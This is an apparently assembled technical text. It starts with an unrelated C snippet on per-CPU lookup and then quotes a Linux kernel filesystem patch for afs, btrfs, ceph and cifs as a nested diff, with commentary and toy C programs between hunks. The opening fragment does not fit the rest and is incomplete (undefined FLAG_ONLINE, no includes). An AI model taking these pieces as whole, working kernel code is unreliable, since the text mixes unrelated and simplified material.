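struct pcpu {
	uint32_t acpi_id;
	uint32_t flags;
	struct pcpu *next;
};

static pthread_mutex_t pcpu_lock = PTHREAD_MUTEX_INITIALIZER;
static struct pcpu *pcpus;

/* Look up a physical CPU by ACPI id and report whether it is online. */
static bool processor_present(uint32_t acpi_id)
{
	const struct pcpu *p;
	bool online = false;

	pthread_mutex_lock(&pcpu_lock);
	for (p = pcpus; p; p = p->next)
		if (p->acpi_id == acpi_id) {
			online = p->flags & FLAG_ONLINE;
			break;
		}
	pthread_mutex_unlock(&pcpu_lock);
	return online;
}

int main(void)
{
	struct pcpu cpu0 = { .acpi_id = 0, .flags = FLAG_ONLINE };

	pcpus = &cpu0;
	printf("acpi 0 online: %d\n", processor_present(0));
	printf("acpi 1 online: %d\n", processor_present(1));
	return 0;
}
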
+diff --git a/fs/Makefile b/fs/Makefile
+index 4dea17840761a..80ab0154419ec 100644
+--- a/fs/Makefile
++++ b/fs/Makefile
+@@ -6,7 +6,6 @@
+ # Rewritten to use lists instead of if-statements.
+ # 
+ 
+-obj-$(CONFIG_SYSCTL)		+= sysctls.o
+ 
+ obj-y :=	open.o read_write.o file_table.o super.o \
+ 		char_dev.o stat.o exec.o pipe.o namei.o fcntl.o \
+@@ -49,7 +48,7 @@ obj-$(CONFIG_FS_MBCACHE)	+= mbcache.o
+ obj-$(CONFIG_FS_POSIX_ACL)	+= posix_acl.o
+ obj-$(CONFIG_NFS_COMMON)	+= nfs_common/
+ obj-$(CONFIG_COREDUMP)		+= coredump.o
+-obj-$(CONFIG_SYSCTL)		+= drop_caches.o
++obj-$(CONFIG_SYSCTL)		+= drop_caches.o sysctls.o
+ 
+ obj-$(CONFIG_FHANDLE)		+= fhandle.o
+ obj-y				+= iomap/
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index b7c1f8c84b38a..be8f8da5b6b02 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -275,6 +275,7 @@ static struct afs_read *afs_read_dir(struct afs_vnode *dvnode, struct key *key)
+ 	loff_t i_size;
+ 	int nr_pages, i;
+ 	int ret;
++	loff_t remote_size = 0;
+ 
+ 	_enter("");
+ 
+@@ -289,6 +290,8 @@ static struct afs_read *afs_read_dir(struct afs_vnode *dvnode, struct key *key)
+ 
+ expand:
+ 	i_size = i_size_read(&dvnode->netfs.inode);
++	if (i_size < remote_size)
++		i_size = remote_size;
+ 	if (i_size < 2048) {
+ 		ret = afs_bad(dvnode, afs_file_error_dir_small);
+ 		goto error;
+@@ -364,6 +367,7 @@ expand:
+ 			 * buffer.
+ 			 */
+ 			up_write(&dvnode->validate_lock);
++			remote_size = req->file_size;
+ 			goto expand;
+ 		}
+ 
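
The afs_read_dir() fix remembers the file size the server reported on a short read (remote_size) and uses it as a floor for the next buffer allocation, so the expand loop converges instead of retrying with a stale local i_size. A toy model of the retry loop (simulated server, illustration only):

#include <stdio.h>

/* Simulated server: the directory is really 6144 bytes. */
#define REAL_SIZE 6144

static long server_read(long bufsize, long *file_size)
{
	*file_size = REAL_SIZE;
	return bufsize >= REAL_SIZE ? 0 : -1;	/* -1: buffer too small */
}

int main(void)
{
	long i_size = 2048;	/* stale local size */
	long remote_size = 0;
	long file_size;

	for (;;) {
		/* Floor the allocation at the last size the server told us. */
		if (i_size < remote_size)
			i_size = remote_size;
		printf("allocating %ld bytes\n", i_size);
		if (server_read(i_size, &file_size) == 0)
			break;
		remote_size = file_size;	/* remember and retry */
	}
	printf("done\n");
	return 0;
}
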
+diff --git a/fs/afs/inode.c b/fs/afs/inode.c
+index 6d3a3dbe49286..5921dd3687e39 100644
+--- a/fs/afs/inode.c
++++ b/fs/afs/inode.c
+@@ -230,6 +230,7 @@ static void afs_apply_status(struct afs_operation *op,
+ 			set_bit(AFS_VNODE_ZAP_DATA, &vnode->flags);
+ 		}
+ 		change_size = true;
++		data_changed = true;
+ 	} else if (vnode->status.type == AFS_FTYPE_DIR) {
+ 		/* Expected directory change is handled elsewhere so
+ 		 * that we can locally edit the directory and save on a
+@@ -449,7 +450,7 @@ static void afs_get_inode_cache(struct afs_vnode *vnode)
+ 				    0 : FSCACHE_ADV_SINGLE_CHUNK,
+ 				    &key, sizeof(key),
+ 				    &aux, sizeof(aux),
+-				    vnode->status.size));
++				    i_size_read(&vnode->netfs.inode)));
+ #endif
+ }
+ 
+@@ -765,6 +766,13 @@ int afs_getattr(struct user_namespace *mnt_userns, const struct path *path,
+ 		if (test_bit(AFS_VNODE_SILLY_DELETED, &vnode->flags) &&
+ 		    stat->nlink > 0)
+ 			stat->nlink -= 1;
++
++		/* Lie about the size of directories.  We maintain a locally
++		 * edited copy and may make different allocation decisions on
++		 * it, but we need to give userspace the server's size.
++		 */
++		if (S_ISDIR(inode->i_mode))
++			stat->size = vnode->netfs.remote_i_size;
+ 	} while (need_seqretry(&vnode->cb_lock, seq));
+ 
+ 	done_seqretry(&vnode->cb_lock, seq);
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index c232636ecdfea..bff2d1fd3c812 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -3160,6 +3160,11 @@ static long btrfs_ioctl_scrub(struct file *file, void __user *arg)
+ 	if (IS_ERR(sa))
+ 		return PTR_ERR(sa);
+ 
++	if (sa->flags & ~BTRFS_SCRUB_SUPPORTED_FLAGS) {
++		ret = -EOPNOTSUPP;
++		goto out;
++	}
++
+ 	if (!(sa->flags & BTRFS_SCRUB_READONLY)) {
+ 		ret = mnt_want_write_file(file);
+ 		if (ret)
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index 210e400378818..e1c7f0aa0ba66 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -430,7 +430,7 @@ void ceph_reservation_status(struct ceph_fs_client *fsc,
+  *
+  * Called with i_ceph_lock held.
+  */
+-static struct ceph_cap *__get_cap_for_mds(struct ceph_inode_info *ci, int mds)
++struct ceph_cap *__get_cap_for_mds(struct ceph_inode_info *ci, int mds)
+ {
+ 	struct ceph_cap *cap;
+ 	struct rb_node *n = ci->i_caps.rb_node;
+diff --git a/fs/ceph/debugfs.c b/fs/ceph/debugfs.c
+index bec3c4549c07d..3904333fa6c38 100644
+--- a/fs/ceph/debugfs.c
++++ b/fs/ceph/debugfs.c
+@@ -248,14 +248,20 @@ static int metrics_caps_show(struct seq_file *s, void *p)
+ 	return 0;
+ }
+ 
+-static int caps_show_cb(struct inode *inode, struct ceph_cap *cap, void *p)
++static int caps_show_cb(struct inode *inode, int mds, void *p)
+ {
++	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct seq_file *s = p;
+-
+-	seq_printf(s, "0x%-17llx%-3d%-17s%-17s\n", ceph_ino(inode),
+-		   cap->session->s_mds,
+-		   ceph_cap_string(cap->issued),
+-		   ceph_cap_string(cap->implemented));
++	struct ceph_cap *cap;
++
++	spin_lock(&ci->i_ceph_lock);
++	cap = __get_cap_for_mds(ci, mds);
++	if (cap)
++		seq_printf(s, "0x%-17llx%-3d%-17s%-17s\n", ceph_ino(inode),
++			   cap->session->s_mds,
++			   ceph_cap_string(cap->issued),
++			   ceph_cap_string(cap->implemented));
++	spin_unlock(&ci->i_ceph_lock);
+ 	return 0;
+ }
+ 
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 27a245d959c0a..54e3c2ab21d22 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -1632,8 +1632,8 @@ static void cleanup_session_requests(struct ceph_mds_client *mdsc,
+  * Caller must hold session s_mutex.
+  */
+ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+-			      int (*cb)(struct inode *, struct ceph_cap *,
+-					void *), void *arg)
++			      int (*cb)(struct inode *, int mds, void *),
++			      void *arg)
+ {
+ 	struct list_head *p;
+ 	struct ceph_cap *cap;
+@@ -1645,6 +1645,8 @@ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+ 	spin_lock(&session->s_cap_lock);
+ 	p = session->s_caps.next;
+ 	while (p != &session->s_caps) {
++		int mds;
++
+ 		cap = list_entry(p, struct ceph_cap, session_caps);
+ 		inode = igrab(&cap->ci->netfs.inode);
+ 		if (!inode) {
+@@ -1652,6 +1654,7 @@ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+ 			continue;
+ 		}
+ 		session->s_cap_iterator = cap;
++		mds = cap->mds;
+ 		spin_unlock(&session->s_cap_lock);
+ 
+ 		if (last_inode) {
+@@ -1663,7 +1666,7 @@ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+ 			old_cap = NULL;
+ 		}
+ 
+-		ret = cb(inode, cap, arg);
++		ret = cb(inode, mds, arg);
+ 		last_inode = inode;
+ 
+ 		spin_lock(&session->s_cap_lock);
+@@ -1696,20 +1699,25 @@ out:
+ 	return ret;
+ }
+ 
+-static int remove_session_caps_cb(struct inode *inode, struct ceph_cap *cap,
+-				  void *arg)
++static int remove_session_caps_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	bool invalidate = false;
+-	int iputs;
++	struct ceph_cap *cap;
++	int iputs = 0;
+ 
+-	dout("removing cap %p, ci is %p, inode is %p\n",
+-	     cap, ci, &ci->netfs.inode);
+ 	spin_lock(&ci->i_ceph_lock);
+-	iputs = ceph_purge_inode_cap(inode, cap, &invalidate);
++	cap = __get_cap_for_mds(ci, mds);
++	if (cap) {
++		dout(" removing cap %p, ci is %p, inode is %p\n",
++		     cap, ci, &ci->netfs.inode);
++
++		iputs = ceph_purge_inode_cap(inode, cap, &invalidate);
++	}
+ 	spin_unlock(&ci->i_ceph_lock);
+ 
+-	wake_up_all(&ci->i_cap_wq);
++	if (cap)
++		wake_up_all(&ci->i_cap_wq);
+ 	if (invalidate)
+ 		ceph_queue_invalidate(inode);
+ 	while (iputs--)
+@@ -1780,8 +1788,7 @@ enum {
+  *
+  * caller must hold s_mutex.
+  */
+-static int wake_up_session_cb(struct inode *inode, struct ceph_cap *cap,
+-			      void *arg)
++static int wake_up_session_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	unsigned long ev = (unsigned long)arg;
+@@ -1792,12 +1799,14 @@ static int wake_up_session_cb(struct inode *inode, struct ceph_cap *cap,
+ 		ci->i_requested_max_size = 0;
+ 		spin_unlock(&ci->i_ceph_lock);
+ 	} else if (ev == RENEWCAPS) {
+-		if (cap->cap_gen < atomic_read(&cap->session->s_cap_gen)) {
+-			/* mds did not re-issue stale cap */
+-			spin_lock(&ci->i_ceph_lock);
++		struct ceph_cap *cap;
++
++		spin_lock(&ci->i_ceph_lock);
++		cap = __get_cap_for_mds(ci, mds);
++		/* mds did not re-issue stale cap */
++		if (cap && cap->cap_gen < atomic_read(&cap->session->s_cap_gen))
+ 			cap->issued = cap->implemented = CEPH_CAP_PIN;
+-			spin_unlock(&ci->i_ceph_lock);
+-		}
++		spin_unlock(&ci->i_ceph_lock);
+ 	} else if (ev == FORCE_RO) {
+ 	}
+ 	wake_up_all(&ci->i_cap_wq);
+@@ -1959,16 +1968,22 @@ out:
+  * Yes, this is a bit sloppy.  Our only real goal here is to respond to
+  * memory pressure from the MDS, though, so it needn't be perfect.
+  */
+-static int trim_caps_cb(struct inode *inode, struct ceph_cap *cap, void *arg)
++static int trim_caps_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	int *remaining = arg;
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	int used, wanted, oissued, mine;
++	struct ceph_cap *cap;
+ 
+ 	if (*remaining <= 0)
+ 		return -1;
+ 
+ 	spin_lock(&ci->i_ceph_lock);
++	cap = __get_cap_for_mds(ci, mds);
++	if (!cap) {
++		spin_unlock(&ci->i_ceph_lock);
++		return 0;
++	}
+ 	mine = cap->issued | cap->implemented;
+ 	used = __ceph_caps_used(ci);
+ 	wanted = __ceph_caps_file_wanted(ci);
+@@ -3911,26 +3926,22 @@ out_unlock:
+ /*
+  * Encode information about a cap for a reconnect with the MDS.
+  */
+-static int reconnect_caps_cb(struct inode *inode, struct ceph_cap *cap,
+-			  void *arg)
++static int reconnect_caps_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	union {
+ 		struct ceph_mds_cap_reconnect v2;
+ 		struct ceph_mds_cap_reconnect_v1 v1;
+ 	} rec;
+-	struct ceph_inode_info *ci = cap->ci;
++	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct ceph_reconnect_state *recon_state = arg;
+ 	struct ceph_pagelist *pagelist = recon_state->pagelist;
+ 	struct dentry *dentry;
++	struct ceph_cap *cap;
+ 	char *path;
+-	int pathlen = 0, err;
++	int pathlen = 0, err = 0;
+ 	u64 pathbase;
+ 	u64 snap_follows;
+ 
+-	dout(" adding %p ino %llx.%llx cap %p %lld %s\n",
+-	     inode, ceph_vinop(inode), cap, cap->cap_id,
+-	     ceph_cap_string(cap->issued));
+-
+ 	dentry = d_find_primary(inode);
+ 	if (dentry) {
+ 		/* set pathbase to parent dir when msg_version >= 2 */
+@@ -3947,6 +3958,15 @@ static int reconnect_caps_cb(struct inode *inode, struct ceph_cap *cap,
+ 	}
+ 
+ 	spin_lock(&ci->i_ceph_lock);
++	cap = __get_cap_for_mds(ci, mds);
++	if (!cap) {
++		spin_unlock(&ci->i_ceph_lock);
++		goto out_err;
++	}
++	dout(" adding %p ino %llx.%llx cap %p %lld %s\n",
++	     inode, ceph_vinop(inode), cap, cap->cap_id,
++	     ceph_cap_string(cap->issued));
++
+ 	cap->seq = 0;        /* reset cap seq */
+ 	cap->issue_seq = 0;  /* and issue_seq */
+ 	cap->mseq = 0;       /* and migrate_seq */
+diff --git a/fs/ceph/mds_client.h b/fs/ceph/mds_client.h
+index 0598faa50e2e0..18b026b1ac63f 100644
+--- a/fs/ceph/mds_client.h
++++ b/fs/ceph/mds_client.h
+@@ -541,8 +541,7 @@ extern void ceph_flush_cap_releases(struct ceph_mds_client *mdsc,
+ extern void ceph_queue_cap_reclaim_work(struct ceph_mds_client *mdsc);
+ extern void ceph_reclaim_caps_nr(struct ceph_mds_client *mdsc, int nr);
+ extern int ceph_iterate_session_caps(struct ceph_mds_session *session,
+-				     int (*cb)(struct inode *,
+-					       struct ceph_cap *, void *),
++				     int (*cb)(struct inode *, int mds, void *),
+ 				     void *arg);
+ extern void ceph_mdsc_pre_umount(struct ceph_mds_client *mdsc);
+ 
+diff --git a/fs/ceph/super.h b/fs/ceph/super.h
+index 07c6906cda70d..b89d2cea4c1d1 100644
+--- a/fs/ceph/super.h
++++ b/fs/ceph/super.h
+@@ -1192,6 +1192,8 @@ extern void ceph_kick_flushing_caps(struct ceph_mds_client *mdsc,
+ 				    struct ceph_mds_session *session);
+ void ceph_kick_flushing_inode_caps(struct ceph_mds_session *session,
+ 				   struct ceph_inode_info *ci);
++extern struct ceph_cap *__get_cap_for_mds(struct ceph_inode_info *ci,
++					  int mds);
+ extern struct ceph_cap *ceph_get_cap_for_mds(struct ceph_inode_info *ci,
+ 					     int mds);
+ extern void ceph_take_cap_refs(struct ceph_inode_info *ci, int caps,
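
The ceph hunks above change the session-cap iteration callbacks to receive an mds id instead of a raw cap pointer; each callback then revalidates via __get_cap_for_mds() under i_ceph_lock and simply skips caps that were freed in the meantime. A small sketch of that lookup-under-lock callback shape (single-cap inode, pthread mutex as a stand-in for the spinlock):

#include <pthread.h>
#include <stdio.h>

struct cap { int mds; int issued; };

struct inode_info {
	pthread_mutex_t lock;	/* stands in for i_ceph_lock */
	struct cap *cap;	/* may be removed concurrently */
};

/* Callback receives the mds id, not a cap pointer, and revalidates. */
static int show_cap_cb(struct inode_info *ci, int mds)
{
	pthread_mutex_lock(&ci->lock);
	if (ci->cap && ci->cap->mds == mds)
		printf("mds%d issued=0x%x\n", mds, ci->cap->issued);
	/* else: cap went away since iteration started -- just skip it */
	pthread_mutex_unlock(&ci->lock);
	return 0;
}

int main(void)
{
	struct cap c = { .mds = 0, .issued = 0x5 };
	struct inode_info ci = { .lock = PTHREAD_MUTEX_INITIALIZER, .cap = &c };

	show_cap_cb(&ci, 0);	/* found */
	ci.cap = NULL;		/* cap removed concurrently */
	show_cap_cb(&ci, 0);	/* safely skipped */
	return 0;
}
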
+diff --git a/fs/cifs/cifs_debug.c b/fs/cifs/cifs_debug.c
+index 72e24256b5ec2..cbf7e6ab638f5 100644
+--- a/fs/cifs/cifs_debug.c
++++ b/fs/cifs/cifs_debug.c
+@@ -279,8 +279,10 @@ static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
+ 		seq_printf(m, "\n%d) ConnectionId: 0x%llx ",
+ 			c, server->conn_id);
+ 
++		spin_lock(&server->srv_lock);
+ 		if (server->hostname)
+ 			seq_printf(m, "Hostname: %s ", server->hostname);
++		spin_unlock(&server->srv_lock);
+ #ifdef CONFIG_CIFS_SMB_DIRECT
+ 		if (!server->rdma)
+ 			goto skip_rdma;
+@@ -620,10 +622,13 @@ static int cifs_stats_proc_show(struct seq_file *m, void *v)
+ 				server->fastest_cmd[j],
+ 				server->slowest_cmd[j]);
+ 		for (j = 0; j < NUMBER_OF_SMB2_COMMANDS; j++)
+-			if (atomic_read(&server->smb2slowcmd[j]))
++			if (atomic_read(&server->smb2slowcmd[j])) {
++				spin_lock(&server->srv_lock);
+ 				seq_printf(m, "  %d slow responses from %s for command %d\n",
+ 					atomic_read(&server->smb2slowcmd[j]),
+ 					server->hostname, j);
++				spin_unlock(&server->srv_lock);
++			}
+ #endif /* STATS2 */
+ 		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+ 			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+diff --git a/fs/cifs/cifs_debug.h b/fs/cifs/cifs_debug.h
+index d44808263cfba..ce5cfd236fdb8 100644
+--- a/fs/cifs/cifs_debug.h
++++ b/fs/cifs/cifs_debug.h
+@@ -81,19 +81,19 @@ do {									\
+ 
+ #define cifs_server_dbg_func(ratefunc, type, fmt, ...)			\
+ do {									\
+-	const char *sn = "";						\
+-	if (server && server->hostname)					\
+-		sn = server->hostname;					\
++	spin_lock(&server->srv_lock);					\
+ 	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
+ 		pr_debug_ ## ratefunc("%s: \\\\%s " fmt,		\
+-				      __FILE__, sn, ##__VA_ARGS__);	\
++				      __FILE__, server->hostname,	\
++				      ##__VA_ARGS__);			\
+ 	} else if ((type) & VFS) {					\
+ 		pr_err_ ## ratefunc("VFS: \\\\%s " fmt,			\
+-				    sn, ##__VA_ARGS__);			\
++				    server->hostname, ##__VA_ARGS__);	\
+ 	} else if ((type) & NOISY && (NOISY != 0)) {			\
+ 		pr_debug_ ## ratefunc("\\\\%s " fmt,			\
+-				      sn, ##__VA_ARGS__);		\
++				      server->hostname, ##__VA_ARGS__);	\
+ 	}								\
++	spin_unlock(&server->srv_lock);					\
+ } while (0)
+ 
+ #define cifs_server_dbg(type, fmt, ...)					\
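
The cifs_server_dbg_func() rework holds srv_lock for the whole print instead of sampling server->hostname into a local first, since the hostname string can now be replaced during DFS failover. The same discipline in a user-space sketch (pthread mutex standing in for the spinlock):

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct server {
	pthread_mutex_t lock;	/* stands in for srv_lock */
	char *hostname;		/* may be reallocated on DFS failover */
};

/* Hold the lock across the whole access: sampling the pointer first
 * and printing later would race with a concurrent free()/replace.
 */
static void log_host(struct server *s, const char *msg)
{
	pthread_mutex_lock(&s->lock);
	printf("\\\\%s %s\n", s->hostname, msg);
	pthread_mutex_unlock(&s->lock);
}

static void set_host(struct server *s, const char *name)
{
	char *dup = strdup(name);

	pthread_mutex_lock(&s->lock);
	free(s->hostname);
	s->hostname = dup;
	pthread_mutex_unlock(&s->lock);
}

int main(void)
{
	struct server s = { .lock = PTHREAD_MUTEX_INITIALIZER };

	set_host(&s, "srv1");
	log_host(&s, "connected");
	set_host(&s, "srv2");	/* failover replaces the string */
	log_host(&s, "reconnected");
	return 0;
}
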
+diff --git a/fs/cifs/cifsglob.h b/fs/cifs/cifsglob.h
+index 5aaaa47dea410..ea216e9d0f944 100644
+--- a/fs/cifs/cifsglob.h
++++ b/fs/cifs/cifsglob.h
+@@ -742,17 +742,23 @@ struct TCP_Server_Info {
+ #endif
+ 	struct mutex refpath_lock; /* protects leaf_fullpath */
+ 	/*
+-	 * Canonical DFS full paths that were used to chase referrals in mount and reconnect.
++	 * origin_fullpath: Canonical copy of smb3_fs_context::source.
++	 *                  It is used for matching existing DFS tcons.
+ 	 *
+-	 * origin_fullpath: first or original referral path
+-	 * leaf_fullpath: last referral path (might be changed due to nested links in reconnect)
++	 * leaf_fullpath: Canonical DFS referral path related to this
++	 *                connection.
++	 *                It is used in DFS cache refresher, reconnect and may
++	 *                change due to nested DFS links.
+ 	 *
+-	 * current_fullpath: pointer to either origin_fullpath or leaf_fullpath
+-	 * NOTE: cannot be accessed outside cifs_reconnect() and smb2_reconnect()
++	 * Both protected by @refpath_lock and @srv_lock.  The @refpath_lock is
++	 * mostly used to avoid requiring a copy of @leaf_fullpath when getting
++	 * cached or new DFS referrals (which might also sleep during I/O).
++	 * @srv_lock is held when making string and NULL comparisons against
++	 * both fields, as in mount(2) and cache refresh.
+ 	 *
+-	 * format: \\HOST\SHARE\[OPTIONAL PATH]
++	 * format: \\HOST\SHARE[\OPTIONAL PATH]
+ 	 */
+-	char *origin_fullpath, *leaf_fullpath, *current_fullpath;
++	char *origin_fullpath, *leaf_fullpath;
+ };
+ 
+ static inline bool is_smb1(struct TCP_Server_Info *server)
+@@ -1768,7 +1774,6 @@ struct cifs_mount_ctx {
+ 	struct TCP_Server_Info *server;
+ 	struct cifs_ses *ses;
+ 	struct cifs_tcon *tcon;
+-	char *origin_fullpath, *leaf_fullpath;
+ 	struct list_head dfs_ses_list;
+ };
+ 
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+index 639df85dafd6c..1765368f373cf 100644
+--- a/fs/cifs/cifsproto.h
++++ b/fs/cifs/cifsproto.h
+@@ -8,6 +8,7 @@
+ #ifndef _CIFSPROTO_H
+ #define _CIFSPROTO_H
+ #include <linux/nls.h>
++#include <linux/ctype.h>
+ #include "trace.h"
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ #include "dfs_cache.h"
+@@ -569,7 +570,7 @@ extern int E_md4hash(const unsigned char *passwd, unsigned char *p16,
+ extern struct TCP_Server_Info *
+ cifs_find_tcp_session(struct smb3_fs_context *ctx);
+ 
+-extern void cifs_put_smb_ses(struct cifs_ses *ses);
++void __cifs_put_smb_ses(struct cifs_ses *ses);
+ 
+ extern struct cifs_ses *
+ cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx);
+@@ -699,4 +700,45 @@ struct super_block *cifs_get_tcon_super(struct cifs_tcon *tcon);
+ void cifs_put_tcon_super(struct super_block *sb);
+ int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry);
+ 
++/* Put references of @ses and @ses->dfs_root_ses */
++static inline void cifs_put_smb_ses(struct cifs_ses *ses)
++{
++	struct cifs_ses *rses = ses->dfs_root_ses;
++
++	__cifs_put_smb_ses(ses);
++	if (rses)
++		__cifs_put_smb_ses(rses);
++}
++
++/* Get an active reference of @ses and @ses->dfs_root_ses.
++ *
++ * NOTE: make sure to call this function when incrementing reference count of
++ * @ses to ensure that any DFS root session attached to it (@ses->dfs_root_ses)
++ * will also get its reference count incremented.
++ *
++ * cifs_put_smb_ses() will put both references, so call it when you're done.
++ */
++static inline void cifs_smb_ses_inc_refcount(struct cifs_ses *ses)
++{
++	lockdep_assert_held(&cifs_tcp_ses_lock);
++
++	ses->ses_count++;
++	if (ses->dfs_root_ses)
++		ses->dfs_root_ses->ses_count++;
++}
++
++static inline bool dfs_src_pathname_equal(const char *s1, const char *s2)
++{
++	if (strlen(s1) != strlen(s2))
++		return false;
++	for (; *s1; s1++, s2++) {
++		if (*s1 == '/' || *s1 == '\\') {
++			if (*s2 != '/' && *s2 != '\\')
++				return false;
++		} else if (tolower(*s1) != tolower(*s2))
++			return false;
++	}
++	return true;
++}
++
+ #endif			/* _CIFSPROTO_H */
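
dfs_src_pathname_equal() compares two UNC-style paths case-insensitively while treating '/' and '\' as the same separator. It is self-contained enough to exercise directly; a small test harness (the function body is copied from the hunk above):

#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Copied from the hunk above: case-insensitive comparison that also
 * treats '/' and '\\' as the same path separator.
 */
static bool dfs_src_pathname_equal(const char *s1, const char *s2)
{
	if (strlen(s1) != strlen(s2))
		return false;
	for (; *s1; s1++, s2++) {
		if (*s1 == '/' || *s1 == '\\') {
			if (*s2 != '/' && *s2 != '\\')
				return false;
		} else if (tolower(*s1) != tolower(*s2))
			return false;
	}
	return true;
}

int main(void)
{
	printf("%d\n", dfs_src_pathname_equal("\\\\SRV\\dfs/link",
					      "//srv/DFS\\link"));	/* 1 */
	printf("%d\n", dfs_src_pathname_equal("\\\\srv\\dfs",
					      "\\\\srv\\dfs2"));	/* 0 */
	return 0;
}
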
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 985e962cf0858..87527512c2660 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -435,8 +435,10 @@ static int __reconnect_target_unlocked(struct TCP_Server_Info *server, const cha
+ 		if (server->hostname != target) {
+ 			hostname = extract_hostname(target);
+ 			if (!IS_ERR(hostname)) {
++				spin_lock(&server->srv_lock);
+ 				kfree(server->hostname);
+ 				server->hostname = hostname;
++				spin_unlock(&server->srv_lock);
+ 			} else {
+ 				cifs_dbg(FYI, "%s: couldn't extract hostname or address from dfs target: %ld\n",
+ 					 __func__, PTR_ERR(hostname));
+@@ -484,7 +486,6 @@ static int reconnect_target_unlocked(struct TCP_Server_Info *server, struct dfs_
+ static int reconnect_dfs_server(struct TCP_Server_Info *server)
+ {
+ 	int rc = 0;
+-	const char *refpath = server->current_fullpath + 1;
+ 	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
+ 	struct dfs_cache_tgt_iterator *target_hint = NULL;
+ 	int num_targets = 0;
+@@ -497,8 +498,10 @@ static int reconnect_dfs_server(struct TCP_Server_Info *server)
+ 	 * through /proc/fs/cifs/dfscache or the target list is empty due to server settings after
+ 	 * refreshing the referral, so, in this case, default it to 1.
+ 	 */
+-	if (!dfs_cache_noreq_find(refpath, NULL, &tl))
++	mutex_lock(&server->refpath_lock);
++	if (!dfs_cache_noreq_find(server->leaf_fullpath + 1, NULL, &tl))
+ 		num_targets = dfs_cache_get_nr_tgts(&tl);
++	mutex_unlock(&server->refpath_lock);
+ 	if (!num_targets)
+ 		num_targets = 1;
+ 
+@@ -542,7 +545,9 @@ static int reconnect_dfs_server(struct TCP_Server_Info *server)
+ 		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
+ 	} while (server->tcpStatus == CifsNeedReconnect);
+ 
+-	dfs_cache_noreq_update_tgthint(refpath, target_hint);
++	mutex_lock(&server->refpath_lock);
++	dfs_cache_noreq_update_tgthint(server->leaf_fullpath + 1, target_hint);
++	mutex_unlock(&server->refpath_lock);
+ 	dfs_cache_free_tgts(&tl);
+ 
+ 	/* Need to set up echo worker again once connection has been established */
+@@ -593,9 +598,7 @@ cifs_echo_request(struct work_struct *work)
+ 		goto requeue_echo;
+ 
+ 	rc = server->ops->echo ? server->ops->echo(server) : -ENOSYS;
+-	if (rc)
+-		cifs_dbg(FYI, "Unable to send echo request to server: %s\n",
+-			 server->hostname);
++	cifs_server_dbg(FYI, "send echo request: rc = %d\n", rc);
+ 
+ 	/* Check witness registrations */
+ 	cifs_swn_check();
+@@ -1011,10 +1014,8 @@ static void clean_demultiplex_info(struct TCP_Server_Info *server)
+ 		 */
+ 	}
+ 
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+ 	kfree(server->origin_fullpath);
+ 	kfree(server->leaf_fullpath);
+-#endif
+ 	kfree(server);
+ 
+ 	length = atomic_dec_return(&tcpSesAllocCount);
+@@ -1425,26 +1426,13 @@ match_security(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 	return true;
+ }
+ 
+-static bool dfs_src_pathname_equal(const char *s1, const char *s2)
+-{
+-	if (strlen(s1) != strlen(s2))
+-		return false;
+-	for (; *s1; s1++, s2++) {
+-		if (*s1 == '/' || *s1 == '\\') {
+-			if (*s2 != '/' && *s2 != '\\')
+-				return false;
+-		} else if (tolower(*s1) != tolower(*s2))
+-			return false;
+-	}
+-	return true;
+-}
+-
+ /* this function must be called with srv_lock held */
+-static int match_server(struct TCP_Server_Info *server, struct smb3_fs_context *ctx,
+-			bool dfs_super_cmp)
++static int match_server(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ {
+ 	struct sockaddr *addr = (struct sockaddr *)&ctx->dstaddr;
+ 
++	lockdep_assert_held(&server->srv_lock);
++
+ 	if (ctx->nosharesock)
+ 		return 0;
+ 
+@@ -1470,27 +1458,41 @@ static int match_server(struct TCP_Server_Info *server, struct smb3_fs_context *
+ 			       (struct sockaddr *)&server->srcaddr))
+ 		return 0;
+ 	/*
+-	 * When matching DFS superblocks, we only check for original source pathname as the
+-	 * currently connected target might be different than the one parsed earlier in i.e.
+-	 * mount.cifs(8).
++	 * - Match for a DFS tcon (@server->origin_fullpath).
++	 * - Match for a DFS root server connection (@server->leaf_fullpath).
++	 * - If none of the above and @ctx->leaf_fullpath is set, then
++	 *   it is a new DFS connection.
++	 * - If 'nodfs' mount option was passed, then match only connections
++	 *   that have no DFS referrals set
++	 *   (i.e. they can't fail over to other targets).
+ 	 */
